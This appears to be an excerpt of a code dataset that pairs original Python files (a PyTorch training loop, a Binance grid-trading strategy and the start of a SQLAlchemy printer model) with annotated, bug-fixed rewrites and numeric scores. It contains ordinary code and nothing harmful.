if i % self.params['log_freq'] == 0:
self.logger.log(i, mode=mode)
if self.params['max_step'] is not None:
if i % self.params['max_step'] == 0:
self.logger.write('Max steps reached!', 'main')
break
if not evaluate:
msg = self.logger.log_val()
self.logger.write(msg, 'main')
self.logger.write(msg, 'val')
else:
msg = self.logger.log_eval()
self.logger.write(msg, 'summary')
return self.meters
def step(self, input, target, mode='train'):
input = self.input_transform(input, mode=mode)
targets = self.target_transform(target, mode=mode)
# Compute output => [batch_size, out_size, num_inputs]
outputs = dict(zip(self.names['outputs'], self.model(input)))
outputs = self.output_transform(outputs, mode=mode)
# Compute loss
loss = {
name: self.loss_weights[name]
* self.criterion[name](outputs[name], targets[name])
for name in self.names['outputs']
}
loss['full'] = sum(loss.values())
for name, value in loss.items():
self.meters[name].update(value.item(), self.batch_size)
# Measure metrics
acc1, acc5 = utils.accuracy(outputs['abstr'], targets['abstr'], topk=(1, 5))
self.meters['top1@abstr'].update(acc1.item(), self.batch_size)
self.meters['top5@abstr'].update(acc5.item(), self.batch_size)
inds = {
1: (0, 4),
2: (4, 10),
3: (10, 14),
4: (14, 15),
}
inds = {k: v for k, v in inds.items() if k >= min(self.scales)}
for scale, (start_idx, stop_idx) in inds.items():
acc1, acc5 = utils.accuracy(
outputs['abstr'][..., start_idx:stop_idx],
targets['abstr'][..., start_idx:stop_idx],
topk=(1, 5),
)
self.meters[f'top1@abstr_{scale}'].update(acc1.item(), self.batch_size)
self.meters[f'top5@abstr_{scale}'].update(acc5.item(), self.batch_size)
if mode == 'train':
# Compute gradient and do SGD step
self.optimizer.zero_grad()
loss['full'].backward()
# Clip gradients
if self.params['clip_gradient'] is not None:
clip_gradient = self.params['clip_gradient']
total_norm = clip_grad_norm_(self.model.parameters(), clip_gradient)
if total_norm > clip_gradient:
print(
f'clipping gradient: {total_norm:.4f} with coef {(clip_gradient/total_norm):.4f}'
)
# Update weights
self.optimizer.step()
elif mode == 'eval':
for name in self.names['outputs']:
probs, preds = F.softmax(outputs[name], 1).sort(1, True)
self.probs[name].append(probs.detach().cpu())
self.preds[name].append(preds.detach().cpu())
self.targets[name].append(targets[name].detach().cpu())
self.outputs[name].append(outputs[name].detach().cpu())
def target_transform(self, target, mode='train'):
targets = {}
min_scale = min(self.scales)
offset = {1: 0, 2: 4, 3: 10, 4: 15}.get(min_scale)
for name, tgt in zip(self.names['targets'], target):
targets[name] = tgt.cuda(non_blocking=True)[:, offset:]
self.batch_size = tgt.size(0)
return targets
def input_transform(self, input, mode='train'):
return input
def output_transform(self, output, mode='train'):
return output
@cache
def name(self):
name = '_'.join(
map(
str,
[
self.__class__.__name__,
self.exp_id,
self.params['dataset_name'],
self.params['basemodel_name'],
'-'.join(map(str, self.param_names['loss_weights'])),
'-'.join(map(str, self.param_names['criterion'])),
'-'.join(map(str, [self.param_names['optimizer'], self.lr])),
self._model.name,
],
)
)
name = self.params['resume'] or name
name = re.sub(r'_(checkpoint|best).pth.tar$', '', name)
name = self.params['prefix'] + name.split('/')[-1]
name = type(self).__name__ + '_' + '_'.join(name.split('_')[1:])
return name
def check_rootfolders(self):
"""Create log and model folder."""
folders_util = [
self.params['log_dir'],
self.params['output_dir'],
self.params['metadata_dir'],
self.params['checkpoint_dir'],
]
for folder in folders_util:
os.makedirs(folder, exist_ok=True)
def save_name(self, save_type='EVAL', mode='val', format='torch'):
ext = {'torch': '.pth', 'pickle': '.pkl', 'npz': '.npz'}.get(format, '')
name = '_'.join(
map(
str,
[
save_type.upper(),
mode.upper(),
'-'.join(self.attrs),
'-'.join(map(str, self.set_maxmin)),
self.name,
],
)
)
return self.params['prefix'] + name + ext
def save_checkpoint(self, state, is_best, filename='checkpoint.pth.tar', freq=5):
checkpoint_dir = os.path.join(
self.params['checkpoint_dir'],
self.__class__.__name__,
'_'.join([type(self._model).__name__]),
)
# type(self._model.model).__name__]))
os.makedirs(checkpoint_dir, exist_ok=True)
checkpoint_file = os.path.join(
checkpoint_dir, f'{self.name}_checkpoint.pth.tar'
)
best_file = checkpoint_file.replace('checkpoint.pth.tar', 'best.pth.tar')
epoch_file = checkpoint_file.replace(
'checkpoint.pth.tar', f'epoch_{state["epoch"]}.pth.tar'
)
# torch.save(state, checkpoint_file, pickle_protocol=4)
torch.save(state, checkpoint_file)
if is_best:
shutil.copyfile(checkpoint_file, best_file)
elif state['epoch'] % freq == 0:
shutil.copyfile(checkpoint_file, epoch_file)
def load_checkpont(self):
if self.params['resume'] is None:
self.params['checkpoint'] = None
return
file = self.params['resume']
if os.path.exists(file):
print(("=> loading checkpoint '{}'".format(file)))
checkpoint = torch.load(file)
self.params['start_epoch'] = checkpoint['epoch']
self.best_acc1 = checkpoint['best_acc1']
self.model.load_state_dict(checkpoint['state_dict'])
try:
self.optimizer.load_state_dict(checkpoint['optimizer'])
except (KeyError, AttributeError):
pass
else:
print(
(
"=> loaded checkpoint '{}' (epoch {})".format(
file, checkpoint['epoch']
)
)
)
print(f'Best Acc@1: {self.best_acc1:.3f}')
torch.cuda.empty_cache()
else:
print(("=> no checkpoint found at '{}'".format(file)))
@cache
def save_prefix(self):
return os.path.join(
self.__class__.__name__,
'_'.join([type(self._model).__name__, type(self._model.model).__name__]),
) | experiments.py | import os
import re
import shutil
import time
from collections import defaultdict
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torch.nn.utils import clip_grad_norm_
import utils
from utils import cache
class AbstractionEmbedding:
names = {
'loss': ['embed', 'abstr'],
'targets': ['embed', 'abstr'],
'outputs': ['embed', 'abstr'],
}
def __init__(self, **params):
self.params = params
for k, v in params.items():
setattr(self, k, v)
self.best_acc1 = 0
self.check_rootfolders()
self.load_checkpont()
self.logger.prepare(self)
cudnn.enabled = self.params['cudnn_enabled']
cudnn.benchmark = self.params['cudnn_benchmark']
self.criterion = {n: c.cuda() for n, c in self.criterion.items()}
print(f'Starting experiment: {self.name}')
def run(self):
    """Main entry point: either run evaluation once, or train for
    num_epochs with periodic validation and checkpointing."""
    if self.params['evaluate']:
        return self.evaluate()
    for epoch in range(self.params['start_epoch'], self.params['num_epochs'],):
        # Train for one epoch
        self.train(epoch)
        # Evaluate on validation set
        if (epoch + 1) % self.val_freq == 0 or epoch == self.num_epochs - 1:
            meters = self.validate(epoch)
            acc1 = meters[self.return_metric].avg
            # Scheduler consumes the mean 'full' loss — presumably a
            # ReduceLROnPlateau-style scheduler; confirm against config.
            self.scheduler.step(meters['full'].avg)
            # Remember best acc@1 and save checkpoint
            is_best = acc1 > self.best_acc1
            self.best_acc1 = max(acc1, self.best_acc1)
            self.save_checkpoint(
                {
                    'epoch': epoch + 1,
                    # 'params': self.params,
                    # 'arch': self.model.module.arch,
                    'state_dict': self.model.state_dict(),
                    'optimizer': self.optimizer.state_dict(),
                    'best_acc1': self.best_acc1,
                },
                is_best,
            )
def train(self, epoch):
    """Run one training epoch over dataloader['train'].

    Logs every log_freq batches, checkpoints every checkpoint_freq batches
    and, when params['max_step'] is set, stops after that many batches.
    """
    # Switch to train mode
    self.model.train()
    self.meters = self.logger.get_progress_meter(
        epoch, len(self.dataloader['train'])
    )
    end = time.time()
    for i, (input, target) in enumerate(self.dataloader['train']):
        # Measure data loading time
        self.meters['data_time'].update(time.time() - end)
        # Forward/backward/optimize for this batch
        self.step(input, target)
        # Measure elapsed time
        self.meters['batch_time'].update(time.time() - end)
        end = time.time()
        if i % self.params['log_freq'] == 0:
            self.logger.log(i, mode='train', epoch=epoch)
        if i % self.params['checkpoint_freq'] == 0:
            self.save_checkpoint(
                {
                    'epoch': epoch + 1,
                    'state_dict': self.model.state_dict(),
                    'optimizer': self.optimizer.state_dict(),
                    'best_acc1': self.best_acc1,
                },
                False,
            )
        if self.params['max_step'] is not None:
            # BUG FIX: the original tested `i % max_step == 0`, which is
            # true at i == 0 and aborted the epoch after a single batch.
            # Stop after max_step batches instead.
            if i + 1 >= self.params['max_step']:
                break
def validate(self, epoch, evaluate=False):
    """Run one gradient-free pass over dataloader['val'].

    With evaluate=True, step(mode='eval') additionally accumulates
    per-batch probabilities, predictions, raw outputs and targets into
    the defaultdicts created here.  Returns the progress-meter dict.
    """
    # Switch to evaluate mode
    self.model.eval()
    self.meters = self.logger.get_progress_meter(epoch, len(self.dataloader['val']))
    if evaluate:
        self.probs = defaultdict(list)
        self.preds = defaultdict(list)
        self.outputs = defaultdict(list)
        self.targets = defaultdict(list)
    with torch.no_grad():
        end = time.time()
        for i, (input, target) in enumerate(self.dataloader['val']):
            self.meters['data_time'].update(time.time() - end)
            mode = 'eval' if evaluate else 'val'
            # Step the model
            self.step(input, target, mode=mode)
            # Measure elapsed time
            self.meters['batch_time'].update(time.time() - end)
            end = time.time()
            if i % self.params['log_freq'] == 0:
                self.logger.log(i, mode=mode)
            if self.params['max_step'] is not None:
                # BUG FIX: `i % max_step == 0` held at i == 0, so validation
                # stopped after one batch.  Stop after max_step batches.
                if i + 1 >= self.params['max_step']:
                    self.logger.write('Max steps reached!', 'main')
                    break
    if not evaluate:
        msg = self.logger.log_val()
        self.logger.write(msg, 'main')
        self.logger.write(msg, 'val')
    else:
        msg = self.logger.log_eval()
        self.logger.write(msg, 'summary')
    return self.meters
def step(self, input, target, mode='train'):
    """Process one batch: forward pass, loss, metrics and — in train mode —
    backward pass and optimizer step.

    mode: 'train' updates weights; 'val' only records meters; 'eval'
    additionally stores sorted probabilities / predictions / outputs /
    targets into the defaultdicts created by validate(evaluate=True).
    """
    input = self.input_transform(input, mode=mode)
    targets = self.target_transform(target, mode=mode)
    # Compute output => [batch_size, out_size, num_inputs]
    outputs = dict(zip(self.names['outputs'], self.model(input)))
    outputs = self.output_transform(outputs, mode=mode)
    # Weighted per-head loss; their sum is tracked under the key 'full'.
    loss = {
        name: self.loss_weights[name]
        * self.criterion[name](outputs[name], targets[name])
        for name in self.names['outputs']
    }
    loss['full'] = sum(loss.values())
    for name, value in loss.items():
        self.meters[name].update(value.item(), self.batch_size)
    # Measure metrics over the full 'abstr' head.
    acc1, acc5 = utils.accuracy(outputs['abstr'], targets['abstr'], topk=(1, 5))
    self.meters['top1@abstr'].update(acc1.item(), self.batch_size)
    self.meters['top5@abstr'].update(acc5.item(), self.batch_size)
    # Per-scale column ranges of the 'abstr' head.  NOTE(review): these must
    # stay in sync with the offsets in target_transform — confirm whenever
    # the scale layout changes.
    inds = {
        1: (0, 4),
        2: (4, 10),
        3: (10, 14),
        4: (14, 15),
    }
    inds = {k: v for k, v in inds.items() if k >= min(self.scales)}
    for scale, (start_idx, stop_idx) in inds.items():
        acc1, acc5 = utils.accuracy(
            outputs['abstr'][..., start_idx:stop_idx],
            targets['abstr'][..., start_idx:stop_idx],
            topk=(1, 5),
        )
        self.meters[f'top1@abstr_{scale}'].update(acc1.item(), self.batch_size)
        self.meters[f'top5@abstr_{scale}'].update(acc5.item(), self.batch_size)
    if mode == 'train':
        # Compute gradient and do SGD step
        self.optimizer.zero_grad()
        loss['full'].backward()
        # Clip gradients
        if self.params['clip_gradient'] is not None:
            clip_gradient = self.params['clip_gradient']
            total_norm = clip_grad_norm_(self.model.parameters(), clip_gradient)
            if total_norm > clip_gradient:
                print(
                    f'clipping gradient: {total_norm:.4f} with coef {(clip_gradient/total_norm):.4f}'
                )
        # Update weights
        self.optimizer.step()
    elif mode == 'eval':
        # Store class probabilities sorted descending, with matching indices.
        for name in self.names['outputs']:
            probs, preds = F.softmax(outputs[name], 1).sort(1, True)
            self.probs[name].append(probs.detach().cpu())
            self.preds[name].append(preds.detach().cpu())
            self.targets[name].append(targets[name].detach().cpu())
            self.outputs[name].append(outputs[name].detach().cpu())
def target_transform(self, target, mode='train'):
    """Move each target tensor to the GPU and drop the label columns that
    belong to scales below the smallest configured scale.

    NOTE(review): a min scale outside {1, 2, 3, 4} makes `offset` None,
    and `[:, None:]` silently degrades to a full slice — confirm that
    fallback is intended.
    """
    targets = {}
    min_scale = min(self.scales)
    # Column offset at which the smallest kept scale starts.
    offset = {1: 0, 2: 4, 3: 10, 4: 15}.get(min_scale)
    for name, tgt in zip(self.names['targets'], target):
        targets[name] = tgt.cuda(non_blocking=True)[:, offset:]
        # Remember batch size for the meter updates in step().
        self.batch_size = tgt.size(0)
    return targets
def input_transform(self, input, mode='train'):
    """Identity hook; subclasses may override to preprocess the input."""
    return input
def output_transform(self, output, mode='train'):
    """Identity hook; subclasses may override to postprocess model outputs."""
    return output
@cache
def name(self):
    """Unique experiment identifier used for logging and checkpoint files.

    Composed from class name, experiment id, dataset, base model,
    loss/criterion/optimizer descriptors and the model's own name.  When
    resuming, the name is derived from the resume path instead: the
    checkpoint suffix is stripped, the prefix re-applied, and the leading
    class token replaced by the current class name.
    """
    name = '_'.join(
        map(
            str,
            [
                self.__class__.__name__,
                self.exp_id,
                self.params['dataset_name'],
                self.params['basemodel_name'],
                '-'.join(map(str, self.param_names['loss_weights'])),
                '-'.join(map(str, self.param_names['criterion'])),
                '-'.join(map(str, [self.param_names['optimizer'], self.lr])),
                self._model.name,
            ],
        )
    )
    # When resuming, reuse the checkpoint's base name instead of composing one.
    name = self.params['resume'] or name
    name = re.sub(r'_(checkpoint|best).pth.tar$', '', name)
    name = self.params['prefix'] + name.split('/')[-1]
    # Replace the leading class-name token with the current class.
    name = type(self).__name__ + '_' + '_'.join(name.split('_')[1:])
    return name
def check_rootfolders(self):
    """Ensure the log, output, metadata and checkpoint directories exist."""
    for key in ('log_dir', 'output_dir', 'metadata_dir', 'checkpoint_dir'):
        os.makedirs(self.params[key], exist_ok=True)
def save_name(self, save_type='EVAL', mode='val', format='torch'):
    """Compose the file name used to store evaluation artifacts.

    Unknown formats get no extension.
    """
    extensions = {'torch': '.pth', 'pickle': '.pkl', 'npz': '.npz'}
    suffix = extensions.get(format, '')
    fields = [
        save_type.upper(),
        mode.upper(),
        '-'.join(self.attrs),
        '-'.join(map(str, self.set_maxmin)),
        self.name,
    ]
    stem = '_'.join(str(field) for field in fields)
    return self.params['prefix'] + stem + suffix
def save_checkpoint(self, state, is_best, filename='checkpoint.pth.tar', freq=5):
    """Persist `state` to the rolling checkpoint file.

    The rolling file is always overwritten; it is additionally copied to
    *_best.pth.tar when is_best is True, or to an *_epoch_<n>.pth.tar
    snapshot every `freq`-th epoch otherwise.  NOTE(review): the
    `filename` parameter is unused — the name is derived from self.name.
    """
    checkpoint_dir = os.path.join(
        self.params['checkpoint_dir'],
        self.__class__.__name__,
        '_'.join([type(self._model).__name__]),
    )
    # type(self._model.model).__name__]))
    os.makedirs(checkpoint_dir, exist_ok=True)
    checkpoint_file = os.path.join(
        checkpoint_dir, f'{self.name}_checkpoint.pth.tar'
    )
    best_file = checkpoint_file.replace('checkpoint.pth.tar', 'best.pth.tar')
    epoch_file = checkpoint_file.replace(
        'checkpoint.pth.tar', f'epoch_{state["epoch"]}.pth.tar'
    )
    # torch.save(state, checkpoint_file, pickle_protocol=4)
    torch.save(state, checkpoint_file)
    if is_best:
        shutil.copyfile(checkpoint_file, best_file)
    elif state['epoch'] % freq == 0:
        shutil.copyfile(checkpoint_file, epoch_file)
def load_checkpont(self):
    """Restore model/optimizer state from params['resume'], if set.

    NOTE(review): the method name is misspelled ('checkpont') but kept,
    since callers outside this view may rely on it.  The "loaded" message
    only prints when the optimizer state loaded without error
    (try/except/else structure below).
    """
    if self.params['resume'] is None:
        self.params['checkpoint'] = None
        return
    file = self.params['resume']
    if os.path.exists(file):
        print(("=> loading checkpoint '{}'".format(file)))
        checkpoint = torch.load(file)
        self.params['start_epoch'] = checkpoint['epoch']
        self.best_acc1 = checkpoint['best_acc1']
        self.model.load_state_dict(checkpoint['state_dict'])
        try:
            self.optimizer.load_state_dict(checkpoint['optimizer'])
        except (KeyError, AttributeError):
            # Checkpoint may lack optimizer state; continue without it.
            pass
        else:
            print(
                (
                    "=> loaded checkpoint '{}' (epoch {})".format(
                        file, checkpoint['epoch']
                    )
                )
            )
            print(f'Best Acc@1: {self.best_acc1:.3f}')
        torch.cuda.empty_cache()
    else:
        print(("=> no checkpoint found at '{}'".format(file)))
@cache
def save_prefix(self):
return os.path.join(
self.__class__.__name__,
'_'.join([type(self._model).__name__, type(self._model.model).__name__]),
) | 0.792986 | 0.160167 |
import decimal
from threading import Thread
from vnpy.trader.constant import Status, Direction
from vnpy.trader.object import AccountData
from vnpy_ctastrategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData
)
from time import time
import numpy as np
import time
import decimal
from decimal import Decimal
class BinanceSpotGridStrategy(CtaTemplate):
    """Grid-trading strategy for a Binance spot pair.

    Places a ladder of limit buys below and limit sells above the start
    price between `bottom` and `top`, spaced `step` (fractional) apart;
    on_order() replaces each fill with an order one grid level away.
    """
    author = "用Python的交易员"
    # Trading pair: base/quote, e.g. DOGE/USDT.
    base = 'DOGE'
    quote = 'USDT'
    # Grid price band and fractional spacing between adjacent levels.
    bottom = 0.24
    top = 0.27
    step = 0.006
    # Quote-currency amount committed per grid order.
    quote_size = 11
    # Price tick size and minimum tradable base amount.
    precision = 0.0001
    min_trade_amount = 1
    # Flags: all initial orders sent / all acknowledged by the exchange.
    initial_orders_sent = False
    initial_orders_submitted = False
    parameters = ['base', 'quote', 'bottom', 'top', 'step', 'quote_size',
                  'precision', 'min_trade_amount']
    variables = ['initial_orders_sent', 'initial_orders_submitted']
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
    """Initialize per-instance state on top of the vn.py CtaTemplate."""
    super().__init__(cta_engine, strategy_name, vt_symbol, setting)
    # Order ids of initial grid orders still awaiting acknowledgement.
    self.initial_order_ids = []
    # Latest traded price seen in on_tick; None until the first tick.
    self.last_tick = None
def check_balance(self, base_needed, quote_needed):
    """Verify free balances cover the whole grid; raise ValueError if not."""
    engine = self.cta_engine.main_engine
    base_account: AccountData = engine.get_account('BINANCE_SPOT.' + self.base)
    quote_account: AccountData = engine.get_account('BINANCE_SPOT.' + self.quote)
    free_base = base_account.balance - base_account.frozen
    free_quote = quote_account.balance - quote_account.frozen
    if free_base < base_needed:
        raise ValueError(
            f'available base: {free_base}, base needed: {base_needed}')
    if free_quote < quote_needed:
        raise ValueError(
            f'available quote: {free_quote}, quote needed: {quote_needed}')
def round_price(self, price: float) -> float:
    """Quantize *price* to the instrument's tick size (self.precision)."""
    quantized = Decimal(str(price)).quantize(Decimal(str(self.precision)))
    return float(quantized)
def get_volume(self, price: float) -> float:
    """Base-currency volume worth quote_size at *price*, rounded up to the
    exchange's minimum trade amount."""
    raw_volume = Decimal(str(self.quote_size / price))
    quantum = Decimal(str(self.min_trade_amount))
    return float(raw_volume.quantize(quantum, decimal.ROUND_UP))
def new_order(self, price, direction):
    """Place one limit order at *price* and record its ids for tracking.

    Raises Exception when the engine returns no order ids (send failure).
    """
    volume = self.get_volume(price)
    if direction == Direction.LONG:
        order_ids = self.buy(price, volume)
    elif direction == Direction.SHORT:
        order_ids = self.sell(price, volume)
    else:
        order_ids = []
    if not order_ids:
        raise Exception(
            f'下单失败: price: {price}, volume: {volume} direction: {direction}')
    self.initial_order_ids += order_ids
def init_orders(self, start_price):
    """Compute grid levels around *start_price* and submit all initial
    orders.  Runs on the worker thread started by on_start().

    Raises ValueError (via check_balance) when free balances cannot cover
    the whole grid.
    """
    self.write_log('开始初始化网格订单')
    buys = []
    sells = []
    price = start_price
    while price > self.bottom:
        price *= (1 - self.step)
        buys.append(self.round_price(price))
    price = start_price
    while price < self.top:
        price *= (1 + self.step)
        sells.append(self.round_price(price))
    quote_needed = self.quote_size * len(buys)
    base_needed = (self.quote_size / np.array(sells)).sum()
    self.check_balance(base_needed, quote_needed)
    # BUG FIX: the original indexed buys[0], buys[1], sells[0], sells[1]
    # unconditionally and raised IndexError when start_price was within two
    # steps of `bottom` or `top`.  Slices keep the same submission order
    # (two nearest levels per side first, without throttling) but tolerate
    # short sides.
    for level in buys[:2]:
        self.new_order(level, Direction.LONG)
    for level in sells[:2]:
        self.new_order(level, Direction.SHORT)
    # Remaining levels are throttled to avoid hammering the exchange API.
    for level in buys[2:]:
        self.new_order(level, Direction.LONG)
        time.sleep(0.5)
    for level in sells[2:]:
        self.new_order(level, Direction.SHORT)
        time.sleep(0.5)
    self.initial_orders_sent = True
    self.write_log('网格订单初始化完毕')
def on_init(self):
    """
    Callback when strategy is inited.
    """
    # Nothing to pre-load for a grid strategy; log only.
    self.write_log('初始化策略')
    pass
def on_start(self):
    """
    Callback when strategy is started.

    Blocks up to ~30 s waiting for the first tick, then launches grid
    initialization on a background thread so this callback returns quickly.
    Raises TimeoutError if no tick arrives in time.
    """
    self.trading = True
    self.write_log('开始策略')
    i = 0
    # Busy-wait (1 s poll) until on_tick has delivered a price.
    while self.last_tick is None:
        time.sleep(1)
        i += 1
        if i > 30:
            raise TimeoutError('超时未获取到最新价格')
    start_price = self.last_tick
    self.write_log(f'以{start_price}为开始价格, 启动初始化线程')
    t = Thread(target=self.init_orders, args=(start_price,))
    t.start()
def on_stop(self):
    """
    Callback when strategy is stopped.  No teardown needed here;
    NOTE(review): open grid orders are not cancelled — confirm intended.
    """
    pass
def on_tick(self, tick: TickData):
    """
    Callback of new tick data update.  Records the last traded price,
    which on_start()/init_orders() use as the grid's center.
    """
    self.last_tick = tick.last_price
def on_bar(self, bar: BarData):
    """
    Callback of new bar data update.  Unused: the grid reacts to ticks
    and order events only.
    """
    pass
def on_order(self, order: OrderData):
    """
    Callback of new order data update.

    Fully-traded grid orders are replaced one grid step away on the
    opposite side; NOTTRADED acknowledgements track when the initial grid
    has been fully submitted.
    """
    if order.status == Status.ALLTRADED:
        if order.direction == Direction.LONG:
            self.write_log(
                f'买单成交 - price: {order.price}, volume: {order.volume}')
            # A filled buy is replaced by a sell one grid step above it.
            price = self.round_price(order.price * (1 + self.step))
            volume = self.get_volume(price)
            self.write_log(f'卖单下单 - price: {price}, volume: {volume}')
            self.sell(price, volume)
        elif order.direction == Direction.SHORT:
            self.write_log(
                f'卖单成交 - price: {order.price}, volume: {order.volume}')
            # BUG FIX: a filled sell must be replaced by a buy one grid
            # step BELOW it.  The original used (1 + self.step), placing
            # the buy above the just-filled sell, where it would execute
            # immediately instead of waiting for a pull-back.
            price = self.round_price(order.price * (1 - self.step))
            volume = self.get_volume(price)
            self.write_log(f'买单下单 - price: {price}, volume: {volume}')
            self.buy(price, volume)
    elif order.status == Status.NOTTRADED:
        if not self.initial_orders_submitted:
            order_id = 'BINANCE_SPOT.' + order.orderid
            if order_id not in self.initial_order_ids:
                self.write_log('Warning: 网格订单未初始化前产生了其他订单')
            else:
                # BUG FIX: only remove ids we actually track; the original
                # called remove() unconditionally and raised ValueError
                # right after logging the warning above.
                self.initial_order_ids.remove(order_id)
            if not self.initial_order_ids and self.initial_orders_sent:
                self.initial_orders_submitted = True
                self.write_log('网格初始订单全部挂单成功')
        self.write_log(
            f'下单成功 - price: {order.price}, volume: {order.volume},'
            f'direction: {order.direction}')
    elif order.status == Status.REJECTED:
        self.write_log(f'下单失败 - id: {order.orderid}')
    elif order.status == Status.CANCELLED:
        self.write_log(f'订单撤销 - id: {order.orderid}')
def on_trade(self, trade: TradeData):
    """
    Callback of new trade data update.  Unused: fills are handled via
    on_order's ALLTRADED branch instead.
    """
    pass
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass | working_dir/strategies/binance_spot_grid_strategy.py | import decimal
from threading import Thread
from vnpy.trader.constant import Status, Direction
from vnpy.trader.object import AccountData
from vnpy_ctastrategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData
)
from time import time
import numpy as np
import time
import decimal
from decimal import Decimal
class BinanceSpotGridStrategy(CtaTemplate):
""""""
author = "用Python的交易员"
base = 'DOGE'
quote = 'USDT'
bottom = 0.24
top = 0.27
step = 0.006
quote_size = 11
precision = 0.0001
min_trade_amount = 1
initial_orders_sent = False
initial_orders_submitted = False
parameters = ['base', 'quote', 'bottom', 'top', 'step', 'quote_size',
'precision', 'min_trade_amount']
variables = ['initial_orders_sent', 'initial_orders_submitted']
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.initial_order_ids = []
self.last_tick = None
def check_balance(self, base_needed, quote_needed):
main_engine = self.cta_engine.main_engine
base_account_id = 'BINANCE_SPOT.' + self.base
quote_account_id = 'BINANCE_SPOT.' + self.quote
base: AccountData = main_engine.get_account(base_account_id)
quote: AccountData = main_engine.get_account(quote_account_id)
available_base = base.balance - base.frozen
available_quote = quote.balance - quote.frozen
if available_base < base_needed:
raise ValueError(
f'available base: {available_base}, base needed: {base_needed}')
if available_quote < quote_needed:
raise ValueError(
f'available quote: {available_quote}, quote needed: {quote_needed}')
def round_price(self, price: float) -> float:
price = Decimal(str(price)).quantize(Decimal(str(self.precision)))
return float(price)
def get_volume(self, price: float) -> float:
volume = Decimal(str(self.quote_size / price)).quantize(
Decimal(str(self.min_trade_amount)), decimal.ROUND_UP)
return float(volume)
def new_order(self, price, direction):
volume = self.get_volume(price)
if direction == Direction.LONG:
order_ids = self.buy(price, volume)
elif direction == Direction.SHORT:
order_ids = self.sell(price, volume)
else:
order_ids = []
if not order_ids:
raise Exception(
f'下单失败: price: {price}, volume: {volume} direction: {direction}')
self.initial_order_ids += order_ids
def init_orders(self, start_price):
self.write_log('开始初始化网格订单')
buys = []
sells = []
price = start_price
while price > self.bottom:
price *= (1 - self.step)
buys.append(self.round_price(price))
price = start_price
while price < self.top:
price *= (1 + self.step)
sells.append(self.round_price(price))
quote_needed = self.quote_size * len(buys)
base_needed = (self.quote_size / np.array(sells)).sum()
self.check_balance(base_needed, quote_needed)
self.new_order(buys[0], Direction.LONG)
self.new_order(buys[1], Direction.LONG)
self.new_order(sells[0], Direction.SHORT)
self.new_order(sells[1], Direction.SHORT)
for price in buys[2:]:
self.new_order(price, Direction.LONG)
time.sleep(0.5)
for price in sells[2:]:
self.new_order(price, Direction.SHORT)
time.sleep(0.5)
self.initial_orders_sent = True
self.write_log('网格订单初始化完毕')
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log('初始化策略')
pass
def on_start(self):
"""
Callback when strategy is started.
"""
self.trading = True
self.write_log('开始策略')
i = 0
while self.last_tick is None:
time.sleep(1)
i += 1
if i > 30:
raise TimeoutError('超时未获取到最新价格')
start_price = self.last_tick
self.write_log(f'以{start_price}为开始价格, 启动初始化线程')
t = Thread(target=self.init_orders, args=(start_price,))
t.start()
def on_stop(self):
"""
Callback when strategy is stopped.
"""
pass
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
self.last_tick = tick.last_price
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
if order.status == Status.ALLTRADED:
if order.direction == Direction.LONG:
self.write_log(
f'买单成交 - price: {order.price}, volume: {order.volume}')
price = self.round_price(order.price * (1 + self.step))
volume = self.get_volume(price)
self.write_log(f'卖单下单 - price: {price}, volume: {volume}')
self.sell(price, volume)
elif order.direction == Direction.SHORT:
self.write_log(
f'卖单成交 - price: {order.price}, volume: {order.volume}')
price = self.round_price(order.price * (1 + self.step))
volume = self.get_volume(price)
self.write_log(f'买单下单 - price: {price}, volume: {volume}')
self.buy(price, volume)
elif order.status == Status.NOTTRADED:
if not self.initial_orders_submitted:
order_id = 'BINANCE_SPOT.' + order.orderid
if order_id not in self.initial_order_ids:
self.write_log('Warning: 网格订单未初始化前产生了其他订单')
self.initial_order_ids.remove(order_id)
if not self.initial_order_ids and self.initial_orders_sent:
self.initial_orders_submitted = True
self.write_log('网格初始订单全部挂单成功')
self.write_log(
f'下单成功 - price: {order.price}, volume: {order.volume},'
f'direction: {order.direction}')
elif order.status == Status.REJECTED:
self.write_log(f'下单失败 - id: {order.orderid}')
elif order.status == Status.CANCELLED:
self.write_log(f'订单撤销 - id: {order.orderid}')
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
pass
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass | 0.488039 | 0.286356 |
from despinassy.db import db
from despinassy.ipc import IpcOrigin, IpcMessageType
from despinassy.Channel import Channel
from sqlalchemy.orm import relationship, validates
from sqlalchemy.exc import IntegrityError
from enum import IntEnum
import datetime
import json
class PrinterDialectEnum(IntEnum):
    """
    List the currently supported printer dialect for printer device to output.
    """

    UNDEFINED = 0
    """Not defined dialect"""
    ZEBRA_ZPL = 1
    """The Zebra ZPL printing language"""
    TEST_JSON = 2
    """Output as JSON object"""

    @staticmethod
    def from_extension(extension: str):
        """Map a file extension ('zpl', 'json', ...) to the matching
        dialect, defaulting to UNDEFINED for anything unknown.

        :param extension: String representing the extension of the dialect.
        """
        known = {
            "zpl": PrinterDialectEnum.ZEBRA_ZPL,
            "json": PrinterDialectEnum.TEST_JSON,
        }
        return known.get(extension, PrinterDialectEnum.UNDEFINED)
class PrinterTypeEnum(IntEnum):
    """
    List the currently supported type of printer device.
    Stored in the `type` column of the Printer model.
    """
    UNDEFINED = 0
    """Not defined printer"""
    STDOUT = 1
    """Print to the terminal"""
    TEST = 2
    """Printer type used only on test case"""
    STATIC = 3
    """Network printer with a static IP address"""
class Printer(db.Model):
    """
    The `Printer` model code.
    Printers entry are devices that can output parts in a defined dialect.
    This model holds the information about this output device.
    A `Printer` can either be something virtual that will just output the
    result to a console or a physical device like a Zebra sticker printer.
    """
    __tablename__ = "printer"
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    type = db.Column(db.Enum(PrinterTypeEnum), nullable=False)
    """
    Type of printer device. See :class:`despinassy.Printer.PrinterTypeEnum` for
    more information.
    """
    available = db.Column(db.Boolean)
    """
    Whether or not the `Printer` is currently available to print something.
